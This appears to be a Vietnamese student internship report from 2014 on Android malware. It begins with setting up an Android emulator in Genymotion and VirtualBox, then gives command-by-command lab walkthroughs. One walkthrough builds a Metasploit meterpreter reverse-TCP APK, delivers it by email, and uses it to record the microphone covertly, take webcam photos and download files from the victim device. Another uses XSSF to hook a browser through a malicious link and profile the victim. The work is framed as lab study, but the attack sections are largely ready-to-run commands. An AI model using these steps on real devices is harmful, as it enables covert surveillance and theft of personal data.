GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 1

BÁO CÁO ĐỀ TÀI THỰC TẬP

ĐỀ TÀI:

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH

CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN

THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI.

GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG

SINH VIÊN THỰC HIỆN: NGUYÊN XUÂN NGOC

BÁO CÁO TUẦN 3-4

(14/08/2014 – 28/08/2014)

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 2

Nội dung:

I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ

VIRTUALBOX

Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy

android (có thể là smartphone, tablet…).

Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào

thiết bị chạy android.

1. Các Tools cần thiết để cài đặt:

- Phần mềm Virtual Box.

- Phần mềm Genymotion.

- Bộ công cụ phát triển Java SE Development Kit.

- Bộ công cụ Android SDK Manager.

2. Tải và cài đặt JDK – Java SE Development Kit:

Bước 1: Tải JDK tại

http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-

1880260.html

Click chọn “Accept License Agreement”

Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 3

Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa

chọn Next. Cuối cùng click Close

Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exe

Gõ lệnh “java <Enter>”.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 4

3. Tải về và cài đặt Android SDK Manager:

Bước 1: Tải về tại link http://developer.android.com/sdk/index.html

Click vào I have read and agree… và chọn phiên bản 64-bit

Click Download

Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exe

Lưu ý là có thể gặp lỗi Fetching https://dl-sll ... Failed to fetch… Close

thông báo này lại.

Xuất hiển cửa sổ Choose Packages to Install . Nếu cửa sổ này rỗng >

Cancel

Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô

Force https://...

Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager

Ta chọn các Packages muốn cài. Và Install

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 5

Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License >

Install > Chờ hoàn tất.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 6

4. Tải về và cài đặt phần mềm tạo máy ảo VirtualBox:

Ta có thể bản VirtualBox phù hợp với máy của bạn.

- Bước 1: Ta tải về file cài đặt VirtualBox tại trang:

http://www.oracle.com/technetwork/server-

storage/virtualbox/downloads/index.html

Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:

Bước 3: Next > Next > Next > Install > Finish

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 7

Bước 4: Giao diện phần mềm sau khi cài đặt xong.

5. Tải về và cài đặt ứng dụng Genymotion:

Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com

Ta có thể đăng ký miễn phí và tải Genymotion về máy.

Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt >

OK > Next

Bước 3: Chọn thư mục lưu cài đặt.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 8

Bước 4: Next > Next > Install > Finish

Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục

Settings

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 9

Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web

www.genymotion.com ở thẻ General

Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường

dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó

lưu lại cài đặt.

F:\ Soft\adt-bundle-windows-x86_64-20140702\sdk

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 10

6. Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox:

Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add

Bước 2: Chọn tên thiết bị mà muốn làm máy ảo.

Xuất hiện cấu hình máy ảo sắp tạo:

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 11

Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo.

Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play

Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 12

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 13

II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ

ANDROID:

1. Các công cụ cần thiết:

Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị:

- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng

VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm).

- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo

tablet chạy Android 4.3.

- Cả 2 thiết bị đều có thể kết nối mạng.

- Có tài khoản email để gửi và nhận file trên cả 2 thiết bị.

2. Tiến trình:

Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.

Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được

internet.

Vào Edit > Virtual Network Editor…

Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở

ô Bridged to.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 14

Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig”

Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng

dụng *.apk và gửi qua email.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 15

Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=<địa

chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên

file>”

Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136

lport=8080 R > /root/Desktop/appsX.apk.

- Tạo ứng dụng ReverseTCP có trên file là appsX.apk.

- Địa chỉ IP máy tấn công là 192.168.149.136.

- Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023).

- Lưu file tại Desktop.

Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh:

“msfconsole”

Bước 6: Sau đó ta set các payload, lhost, lport bằng các lệnh:

“set payload android/meterpreter/reverse_tcp”

“set lhost 192.168.149.136”

“set lport 8080”

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 16

Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công.

Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng

dụng MainActivity. Khởi động lên và nhấp vào ReverseTCP.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 17

Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân.

Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 18

3. Khai thác thông tin hê thống:

Xem thông tin hệ thống bằng lệnh “sysinfo”.

4. Ghi âm lén:

Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh

“record_mic”.

File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali.

5. Khai thác webcam và chụp ảnh lén:

Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh

lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã

webcam>”.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 19

File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali .

6. Khai thác file hệ thống của máy nạn nhân:

Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 20

7. Khai thác dữ liệu từ SDCARD:

Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”.

Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD.

Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd

Download” và lệnh liệt kê “ls”.

Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”.

Ở đây dùng lệnh “download appsX.apk”.

Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn

công Kali.

8. Kết thúc tấn công:

Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 21

III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA

MÃ ĐỘC:

1. Các công cụ cần thiết:

Để tấn công vào thiết bị Android thông qua liên kết chứa mã độc ta cũng cần

chuẩn bị như tấn công bằng file mã độc ở trên:

- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng

VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm).

- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo

tablet chạy Android 4.3.

- Cả 2 thiết bị đều có thể kết nối mạng.

- Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị.

2. Tiến trình:

Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.

Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật

Framework

“msfupdate”

“cd /opt/metasploit/apps/pro/msf3”

“svn export http://xssf.googlecode.com/svn/trunk/ ./ --force”

Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 22

Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true

Mode=Verbose”

Bước 5: Thực hiện lệnh “xssf_urls”

Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test

page, XSSF logs page…

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 23

Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page:

http://192.168.149.136:80/xssf/test.html

Ta nhận được thông báo trên máy tấn công Kali:

3. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc:

Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường

dẫn mã độc http://192.168.149.136:80/xssf/test.html

4. Xem thông tin về nạn nhân đang truy cập:

Dùng lệnh “xssf_information <ID máy nạn nhân>”

Ở đây ví dụ là “xssf_information 1”

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 24

5. Khai thác dữ liệu từ máy nạn nhân:

Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có

thể thao tác lên máy nạn nhân

Gửi Thông báo XSSF đến máy nạn nhân qua lệnh:

“use auxiliary/xssf/public/misc/alert”

“run”

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 25

Ở máy nạn nhân sẽ nhận được cảnh báo XSSF

Thoát ra msf bằng lệnh “Ctrl+C” > “back”

Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không

bằng lệnh:

“use auxiliary/xssf/public/misc/visited_pages”

“run”

Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa:

“use auxiliary/gather/android_htmlfileprovider”

“set SRVPORT 87”

“set URIPATH /”

“run”

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 26

Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/

Ta nhận được thông tin máy nạn nhân:

6. Thoát khỏi XSSF của Metasploit:

Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 27

IV – NGUỒN THAM KHẢO

http://www.oracle.com/technetwork/server-

storage/virtualbox/downloads/index.html

http://www.genymotion.com/

http://developer.android.com/sdk/index.html#download

http://www.oracle.com/technetwork/java/javase/downloads

http://www.whitehat.vn/threads/

Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA –

www.Athena.Edu.Vn